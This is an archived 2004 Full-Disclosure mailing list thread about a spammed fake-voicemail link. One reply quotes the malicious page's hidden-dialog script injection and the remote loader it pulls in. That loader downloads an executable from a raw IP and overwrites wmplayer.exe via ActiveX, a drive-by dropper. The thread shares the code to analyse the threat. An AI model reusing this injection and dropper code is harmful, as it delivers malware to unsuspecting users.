Full Disclosure mailing list archives
Re: spamming trojan?
From: Michael Gargiullo <mgargiullo () warpdrive net>
Date: Wed, 16 Jun 2004 09:59:43 -0400
On Wed, 2004-06-16 at 08:23, Geo. wrote:
Received a spam this morning claiming I have a voicemail with the link (warning do not click the link) http:-//www-1voicemailbox-net/voicemail/ (dashes added by me) which brings up a frames based page with one of the frames containing this function InjectedDuringRedirection(){ showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'"; Anyone want to try and analyze what this thing is? It was spammed to about 30 addresses here this morning. Geo.
Here's the contents: var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; so whatever w_e_d.exe is... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Antivirus/Trojan/Spyware scanners DoS!, (continued)
- Re: Antivirus/Trojan/Spyware scanners DoS! Marcin Owsiany (Jun 13)
- Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Benjamin (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Syke (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Benjamin (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! evilninja (Jun 13)
- RE: Antivirus/Trojan/Spyware scanners DoS! Sean Crawford (Jun 13)
- RE: Antivirus/Trojan/Spyware scanners DoS! Aditya, ALD [Aditya Lalit Deshmukh] (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Cory Donnelly (Jun 15)
- spamming trojan? Geo. (Jun 16)
- Re: spamming trojan? Michael Gargiullo (Jun 16)
- Message not available
- Message not available
- Re: spamming trojan? joe smith (Jun 16)
- Re: spamming trojan? Michael Gargiullo (Jun 16)
- Re: spamming trojan? joe smith (Jun 16)
- Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 16)
- Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 17)
- Re: spamming trojan? Paul Schmehl (Jun 16)
- RE: Antivirus/Trojan/Spyware scanners DoS! Geo. (Jun 16)
- Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)